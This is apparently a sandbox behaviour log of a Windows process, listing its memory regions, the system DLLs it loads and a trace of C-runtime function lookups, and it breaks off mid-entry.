start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3198 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3199 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3201 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3202 start_va = 0x7fefdfd0000 end_va = 0x7fefed57fff entry_point = 0x7fefdfd0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 3203 start_va = 0x7feff640000 end_va = 0x7feff6b0fff entry_point = 0x7feff640000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 3204 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3206 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3207 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3209 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3210 start_va = 0x7feffa40000 end_va = 0x7feffc42fff entry_point = 0x7feffa40000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3211 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3213 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3214 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3216 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3217 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3219 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3220 start_va = 0x7feffd80000 end_va = 0x7feffe56fff entry_point = 0x7feffd80000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3221 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3223 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3224 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3226 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3227 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3229 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3300 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3302 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3303 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3305 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3306 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3308 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3309 start_va = 0x7fefddf0000 end_va = 0x7fefdf56fff entry_point = 0x7fefddf0000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 3310 start_va = 0x7fefdc30000 end_va = 0x7fefdc3efff entry_point = 0x7fefdc30000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 3311 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3313 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3314 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3316 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3317 start_va = 0x7fef7200000 end_va = 0x7fef7270fff entry_point = 0x7fef7200000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 3318 start_va = 0x7fef7190000 end_va = 0x7fef71f3fff entry_point = 0x7fef7190000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 3319 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3321 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3322 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3324 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3325 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3327 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3328 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3330 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3331 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3333 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3334 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3336 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3337 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3339 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3340 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3342 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3343 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3345 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3346 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3348 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3349 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3351 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3352 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3354 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3355 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3357 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3358 start_va = 0x7fefee30000 end_va = 0x7fefee7cfff entry_point = 0x7fefee30000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 3359 start_va = 0x7feffec0000 end_va = 0x7feffec7fff entry_point = 0x7feffec0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 3360 start_va = 0x1f80000 end_va = 0x21cffff entry_point = 0x0 region_type = private name = "private_0x0000000001f80000" filename = "" Region: id = 3361 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3363 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3371 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3373 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3374 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3376 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3377 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3379 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3380 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3382 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3383 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3385 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3386 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3388 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3389 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3391 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3392 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3394 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3395 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3397 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3398 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3400 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3401 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3403 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3404 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3406 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3407 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3409 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3410 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3412 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3413 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3415 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3417 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3418 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3419 start_va = 0x7fefb680000 end_va = 0x7fefb6a6fff entry_point = 0x7fefb680000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 3420 start_va = 0x7fefb670000 end_va = 0x7fefb67afff entry_point = 0x7fefb670000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 3421 start_va = 0x7fefcf30000 end_va = 0x7fefcf4dfff entry_point = 0x7fefcf30000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 3422 start_va = 0x7fefdb90000 end_va = 0x7fefdb9efff entry_point = 0x7fefdb90000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4703 start_va = 0x7fefd620000 end_va = 0x7fefd66dfff entry_point = 0x7fefd620000 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 4704 start_va = 0x7fefd5f0000 end_va = 0x7fefd611fff entry_point = 0x7fefd5f0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 4705 start_va = 0x1f80000 end_va = 0x1ffcfff entry_point = 0x1f80000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 4706 start_va = 0x2150000 end_va = 0x21cffff entry_point = 0x0 region_type = private name = "private_0x0000000002150000" filename = "" Region: id = 4707 start_va = 0x1f80000 end_va = 0x1ffcfff entry_point = 0x1f80000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 4708 start_va = 0x7fefda80000 end_va = 0x7fefda8efff entry_point = 0x7fefda80000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 4709 start_va = 0x1fa0000 end_va = 0x201ffff entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 4710 start_va = 0x7fffffdb000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 4711 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 4712 start_va = 0x7feff9a0000 end_va = 0x7feffa38fff entry_point = 0x7feff9a0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 4713 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002c0000" filename = "" Region: id = 4714 start_va = 0x7fefb8f0000 end_va = 0x7fefba16fff entry_point = 0x7fefb8f0000 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 4715 start_va = 0x7fefda50000 end_va = 0x7fefda74fff entry_point = 0x7fefda50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 4716 start_va = 0x2d0000 end_va = 0x2d0fff entry_point = 0x2d0000 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4717 start_va = 0x2d0000 end_va = 0x2d0fff entry_point = 0x2d0000 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4718 start_va = 0x21d0000 end_va = 0x249efff entry_point = 0x21d0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4719 start_va = 0x2d0000 end_va = 0x2d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Thread: id = 151 os_tid = 0x9a0 [0140.254] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.254] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.267] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="msvcrt.dll", BaseAddress=0x20025 | out: BaseAddress=0x20025*=0x7feff5a0000) returned 0x0 [0140.267] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.267] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.269] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="__C_specific_handler", Ordinal=0x0, ProcedureAddress=0x20025 | out: ProcedureAddress=0x20025*=0x77c5850c) returned 0x0 [0140.269] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.269] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.271] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="_XcptFilter", Ordinal=0x0, ProcedureAddress=0x2001c | out: ProcedureAddress=0x2001c*=0x7feff5e0d98) returned 0x0 [0140.271] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.271] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.273] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="_exit", Ordinal=0x0, ProcedureAddress=0x20016 | out: ProcedureAddress=0x20016*=0x7feff5ec234) returned 0x0 [0140.273] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.273] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.275] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="_cexit", Ordinal=0x0, ProcedureAddress=0x20017 | out: ProcedureAddress=0x20017*=0x7feff5b4640) returned 0x0 [0140.275] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.275] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.276] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="exit", Ordinal=0x0, ProcedureAddress=0x20015 | out: ProcedureAddress=0x20015*=0x7feff5a99f4) returned 0x0 [0140.276] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.276] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.278] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="_wcmdln", Ordinal=0x0, ProcedureAddress=0x20018 | out: ProcedureAddress=0x20018*=0x7feff6310a8) returned 0x0 [0140.278] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.278] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.280] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="_initterm", Ordinal=0x0, ProcedureAddress=0x2001a | out: ProcedureAddress=0x2001a*=0x7feff5a44f0) returned 0x0 [0140.280] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.280] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.282] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="_amsg_exit", Ordinal=0x0, ProcedureAddress=0x2001b | out: ProcedureAddress=0x2001b*=0x7feff5ec260) returned 0x0 [0140.282] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.282] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.283] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="_localtime64", Ordinal=0x0, ProcedureAddress=0x2001d | out: ProcedureAddress=0x2001d*=0x7feff5a5ee0) returned 0x0 [0140.283] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.283] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.285] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="_time64", Ordinal=0x0, ProcedureAddress=0x20018 | out: ProcedureAddress=0x20018*=0x7feff5a3b18) returned 0x0 [0140.285] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.285] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.287] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="??2@YAPEAX_K@Z", Ordinal=0x0, ProcedureAddress=0x2001f | out: ProcedureAddress=0x2001f*=0x7feff5a3310) returned 0x0 [0140.287] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.287] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.288] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="__setusermatherr", Ordinal=0x0, ProcedureAddress=0x20021 | out: ProcedureAddress=0x20021*=0x7feff60da94) returned 0x0 [0140.289] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.289] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.305] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="_commode", Ordinal=0x0, ProcedureAddress=0x20019 | out: ProcedureAddress=0x20019*=0x7feff631280) returned 0x0 [0140.305] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.305] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.307] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="_fmode", Ordinal=0x0, ProcedureAddress=0x20017 | out: ProcedureAddress=0x20017*=0x7feff63127c) returned 0x0 [0140.307] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.307] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.308] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="__set_app_type", Ordinal=0x0, ProcedureAddress=0x2001f | out: ProcedureAddress=0x2001f*=0x7feff5ab088) returned 0x0 [0140.308] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.308] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.310] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="?terminate@@YAXXZ", Ordinal=0x0, ProcedureAddress=0x20022 | out: ProcedureAddress=0x20022*=0x7feff5caa70) returned 0x0 [0140.310] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.310] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.312] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="sprintf", Ordinal=0x0, ProcedureAddress=0x20018 | out: ProcedureAddress=0x20018*=0x7feff5f93f4) returned 0x0 [0140.312] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.312] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.314] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="sscanf", Ordinal=0x0, ProcedureAddress=0x20017 | out: ProcedureAddress=0x20017*=0x7feff5f9d2c) returned 0x0 [0140.314] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.314] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.316] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="free", Ordinal=0x0, ProcedureAddress=0x20015 | out: ProcedureAddress=0x20015*=0x7feff5a10a8) returned 0x0 [0140.316] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.316] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.318] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="malloc", Ordinal=0x0, ProcedureAddress=0x20017 | out: ProcedureAddress=0x20017*=0x7feff5a12dc) returned 0x0 [0140.318] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.318] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.320] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="strtok", Ordinal=0x0, ProcedureAddress=0x20017 | out: ProcedureAddress=0x20017*=0x7feff5b4210) returned 0x0 [0140.320] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.320] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.322] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="realloc", Ordinal=0x0, ProcedureAddress=0x20018 | out: ProcedureAddress=0x20018*=0x7feff5a4860) returned 0x0 [0140.322] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.322] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.323] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="_CxxThrowException", Ordinal=0x0, ProcedureAddress=0x20023 | out: ProcedureAddress=0x20023*=0x7feff5cab00) returned 0x0 [0140.323] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.324] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.325] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="??1type_info@@UEAA@XZ", Ordinal=0x0, ProcedureAddress=0x20026 | out: ProcedureAddress=0x20026*=0x7feff5d2ef8) returned 0x0 [0140.325] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.325] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.327] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="__wgetmainargs", Ordinal=0x0, ProcedureAddress=0x2001f | out: ProcedureAddress=0x2001f*=0x7feff5b2f18) returned 0x0 [0140.327] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.327] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.329] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="_vsnprintf", Ordinal=0x0, ProcedureAddress=0x2001b | out: ProcedureAddress=0x2001b*=0x7feff5a2324) returned 0x0 [0140.329] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.329] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.331] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="atoi", Ordinal=0x0, ProcedureAddress=0x20015 | out: 